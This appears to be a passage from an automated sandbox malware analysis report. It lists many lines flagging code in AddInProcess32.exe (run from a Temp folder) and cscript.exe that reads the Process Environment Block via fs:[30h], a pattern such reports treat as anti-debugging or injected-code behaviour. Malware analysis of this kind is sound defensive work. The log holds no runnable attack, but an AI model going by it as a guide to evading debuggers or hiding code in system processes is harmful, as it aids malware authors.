Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F2073 mov eax, dword ptr fs:[00000030h]	1_2_013F2073
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0140740D mov eax, dword ptr fs:[00000030h]	1_2_0140740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0140740D mov eax, dword ptr fs:[00000030h]	1_2_0140740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0140740D mov eax, dword ptr fs:[00000030h]	1_2_0140740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01404015 mov eax, dword ptr fs:[00000030h]	1_2_01404015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01404015 mov eax, dword ptr fs:[00000030h]	1_2_01404015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135746D mov eax, dword ptr fs:[00000030h]	1_2_0135746D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01350050 mov eax, dword ptr fs:[00000030h]	1_2_01350050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01350050 mov eax, dword ptr fs:[00000030h]	1_2_01350050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013CC450 mov eax, dword ptr fs:[00000030h]	1_2_013CC450
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013CC450 mov eax, dword ptr fs:[00000030h]	1_2_013CC450
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136A44B mov eax, dword ptr fs:[00000030h]	1_2_0136A44B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136F0BF mov ecx, dword ptr fs:[00000030h]	1_2_0136F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136F0BF mov eax, dword ptr fs:[00000030h]	1_2_0136F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136F0BF mov eax, dword ptr fs:[00000030h]	1_2_0136F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01408CD6 mov eax, dword ptr fs:[00000030h]	1_2_01408CD6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]	1_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]	1_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]	1_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]	1_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]	1_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]	1_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013790AF mov eax, dword ptr fs:[00000030h]	1_2_013790AF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134849B mov eax, dword ptr fs:[00000030h]	1_2_0134849B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01339080 mov eax, dword ptr fs:[00000030h]	1_2_01339080
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B3884 mov eax, dword ptr fs:[00000030h]	1_2_013B3884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B3884 mov eax, dword ptr fs:[00000030h]	1_2_013B3884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F14FB mov eax, dword ptr fs:[00000030h]	1_2_013F14FB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6CF0 mov eax, dword ptr fs:[00000030h]	1_2_013B6CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6CF0 mov eax, dword ptr fs:[00000030h]	1_2_013B6CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6CF0 mov eax, dword ptr fs:[00000030h]	1_2_013B6CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013358EC mov eax, dword ptr fs:[00000030h]	1_2_013358EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013CB8D0 mov eax, dword ptr fs:[00000030h]	1_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013CB8D0 mov ecx, dword ptr fs:[00000030h]	1_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013CB8D0 mov eax, dword ptr fs:[00000030h]	1_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013CB8D0 mov eax, dword ptr fs:[00000030h]	1_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013CB8D0 mov eax, dword ptr fs:[00000030h]	1_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013CB8D0 mov eax, dword ptr fs:[00000030h]	1_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136E730 mov eax, dword ptr fs:[00000030h]	1_2_0136E730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01408B58 mov eax, dword ptr fs:[00000030h]	1_2_01408B58
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01334F2E mov eax, dword ptr fs:[00000030h]	1_2_01334F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01334F2E mov eax, dword ptr fs:[00000030h]	1_2_01334F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135F716 mov eax, dword ptr fs:[00000030h]	1_2_0135F716
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F131B mov eax, dword ptr fs:[00000030h]	1_2_013F131B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01408F6A mov eax, dword ptr fs:[00000030h]	1_2_01408F6A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013CFF10 mov eax, dword ptr fs:[00000030h]	1_2_013CFF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013CFF10 mov eax, dword ptr fs:[00000030h]	1_2_013CFF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136A70E mov eax, dword ptr fs:[00000030h]	1_2_0136A70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136A70E mov eax, dword ptr fs:[00000030h]	1_2_0136A70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01363B7A mov eax, dword ptr fs:[00000030h]	1_2_01363B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01363B7A mov eax, dword ptr fs:[00000030h]	1_2_01363B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0140070D mov eax, dword ptr fs:[00000030h]	1_2_0140070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0140070D mov eax, dword ptr fs:[00000030h]	1_2_0140070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133DB60 mov ecx, dword ptr fs:[00000030h]	1_2_0133DB60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134FF60 mov eax, dword ptr fs:[00000030h]	1_2_0134FF60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133F358 mov eax, dword ptr fs:[00000030h]	1_2_0133F358
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133DB40 mov eax, dword ptr fs:[00000030h]	1_2_0133DB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134EF40 mov eax, dword ptr fs:[00000030h]	1_2_0134EF40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01364BAD mov eax, dword ptr fs:[00000030h]	1_2_01364BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01364BAD mov eax, dword ptr fs:[00000030h]	1_2_01364BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01364BAD mov eax, dword ptr fs:[00000030h]	1_2_01364BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01348794 mov eax, dword ptr fs:[00000030h]	1_2_01348794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01362397 mov eax, dword ptr fs:[00000030h]	1_2_01362397
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136B390 mov eax, dword ptr fs:[00000030h]	1_2_0136B390
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B7794 mov eax, dword ptr fs:[00000030h]	1_2_013B7794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B7794 mov eax, dword ptr fs:[00000030h]	1_2_013B7794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B7794 mov eax, dword ptr fs:[00000030h]	1_2_013B7794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F138A mov eax, dword ptr fs:[00000030h]	1_2_013F138A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01341B8F mov eax, dword ptr fs:[00000030h]	1_2_01341B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01341B8F mov eax, dword ptr fs:[00000030h]	1_2_01341B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013ED380 mov ecx, dword ptr fs:[00000030h]	1_2_013ED380
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013737F5 mov eax, dword ptr fs:[00000030h]	1_2_013737F5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]	1_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]	1_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]	1_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]	1_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]	1_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]	1_2_013603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135DBE9 mov eax, dword ptr fs:[00000030h]	1_2_0135DBE9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01405BA5 mov eax, dword ptr fs:[00000030h]	1_2_01405BA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B53CA mov eax, dword ptr fs:[00000030h]	1_2_013B53CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B53CA mov eax, dword ptr fs:[00000030h]	1_2_013B53CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013EFE3F mov eax, dword ptr fs:[00000030h]	1_2_013EFE3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133E620 mov eax, dword ptr fs:[00000030h]	1_2_0133E620
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01374A2C mov eax, dword ptr fs:[00000030h]	1_2_01374A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01374A2C mov eax, dword ptr fs:[00000030h]	1_2_01374A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01408A62 mov eax, dword ptr fs:[00000030h]	1_2_01408A62
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01335210 mov eax, dword ptr fs:[00000030h]	1_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01335210 mov ecx, dword ptr fs:[00000030h]	1_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01335210 mov eax, dword ptr fs:[00000030h]	1_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01335210 mov eax, dword ptr fs:[00000030h]	1_2_01335210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133AA16 mov eax, dword ptr fs:[00000030h]	1_2_0133AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133AA16 mov eax, dword ptr fs:[00000030h]	1_2_0133AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01353A1C mov eax, dword ptr fs:[00000030h]	1_2_01353A1C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136A61C mov eax, dword ptr fs:[00000030h]	1_2_0136A61C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136A61C mov eax, dword ptr fs:[00000030h]	1_2_0136A61C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133C600 mov eax, dword ptr fs:[00000030h]	1_2_0133C600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133C600 mov eax, dword ptr fs:[00000030h]	1_2_0133C600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133C600 mov eax, dword ptr fs:[00000030h]	1_2_0133C600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01368E00 mov eax, dword ptr fs:[00000030h]	1_2_01368E00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1608 mov eax, dword ptr fs:[00000030h]	1_2_013F1608
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01348A0A mov eax, dword ptr fs:[00000030h]	1_2_01348A0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135AE73 mov eax, dword ptr fs:[00000030h]	1_2_0135AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135AE73 mov eax, dword ptr fs:[00000030h]	1_2_0135AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135AE73 mov eax, dword ptr fs:[00000030h]	1_2_0135AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135AE73 mov eax, dword ptr fs:[00000030h]	1_2_0135AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135AE73 mov eax, dword ptr fs:[00000030h]	1_2_0135AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0137927A mov eax, dword ptr fs:[00000030h]	1_2_0137927A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134766D mov eax, dword ptr fs:[00000030h]	1_2_0134766D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013EB260 mov eax, dword ptr fs:[00000030h]	1_2_013EB260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013EB260 mov eax, dword ptr fs:[00000030h]	1_2_013EB260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FEA55 mov eax, dword ptr fs:[00000030h]	1_2_013FEA55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013C4257 mov eax, dword ptr fs:[00000030h]	1_2_013C4257
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01339240 mov eax, dword ptr fs:[00000030h]	1_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01339240 mov eax, dword ptr fs:[00000030h]	1_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01339240 mov eax, dword ptr fs:[00000030h]	1_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01339240 mov eax, dword ptr fs:[00000030h]	1_2_01339240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]	1_2_01347E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]	1_2_01347E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]	1_2_01347E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]	1_2_01347E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]	1_2_01347E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]	1_2_01347E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FAE44 mov eax, dword ptr fs:[00000030h]	1_2_013FAE44
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FAE44 mov eax, dword ptr fs:[00000030h]	1_2_013FAE44
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0134AAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0134AAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136FAB0 mov eax, dword ptr fs:[00000030h]	1_2_0136FAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01408ED6 mov eax, dword ptr fs:[00000030h]	1_2_01408ED6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013352A5 mov eax, dword ptr fs:[00000030h]	1_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013352A5 mov eax, dword ptr fs:[00000030h]	1_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013352A5 mov eax, dword ptr fs:[00000030h]	1_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013352A5 mov eax, dword ptr fs:[00000030h]	1_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013352A5 mov eax, dword ptr fs:[00000030h]	1_2_013352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B46A7 mov eax, dword ptr fs:[00000030h]	1_2_013B46A7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136D294 mov eax, dword ptr fs:[00000030h]	1_2_0136D294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136D294 mov eax, dword ptr fs:[00000030h]	1_2_0136D294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013CFE87 mov eax, dword ptr fs:[00000030h]	1_2_013CFE87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01362AE4 mov eax, dword ptr fs:[00000030h]	1_2_01362AE4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013616E0 mov ecx, dword ptr fs:[00000030h]	1_2_013616E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013476E2 mov eax, dword ptr fs:[00000030h]	1_2_013476E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01400EA5 mov eax, dword ptr fs:[00000030h]	1_2_01400EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01400EA5 mov eax, dword ptr fs:[00000030h]	1_2_01400EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01400EA5 mov eax, dword ptr fs:[00000030h]	1_2_01400EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01378EC7 mov eax, dword ptr fs:[00000030h]	1_2_01378EC7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013636CC mov eax, dword ptr fs:[00000030h]	1_2_013636CC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01362ACB mov eax, dword ptr fs:[00000030h]	1_2_01362ACB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013EFEC0 mov eax, dword ptr fs:[00000030h]	1_2_013EFEC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B746D mov eax, dword ptr fs:[00000030h]	7_2_047B746D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CA44B mov eax, dword ptr fs:[00000030h]	7_2_047CA44B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04868CD6 mov eax, dword ptr fs:[00000030h]	7_2_04868CD6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CBC2C mov eax, dword ptr fs:[00000030h]	7_2_047CBC2C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]	7_2_04816CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]	7_2_04816CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]	7_2_04816CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048514FB mov eax, dword ptr fs:[00000030h]	7_2_048514FB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]	7_2_04851C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]	7_2_0486740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]	7_2_0486740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]	7_2_0486740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]	7_2_04816C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]	7_2_04816C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]	7_2_04816C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]	7_2_04816C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]	7_2_0482C450
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]	7_2_0482C450
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A849B mov eax, dword ptr fs:[00000030h]	7_2_047A849B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]	7_2_047BC577
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]	7_2_047BC577
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]	7_2_048605AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]	7_2_048605AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B7D50 mov eax, dword ptr fs:[00000030h]	7_2_047B7D50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D3D43 mov eax, dword ptr fs:[00000030h]	7_2_047D3D43
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]	7_2_047C4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]	7_2_047C4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]	7_2_047C4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]	7_2_04816DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]	7_2_04816DC9
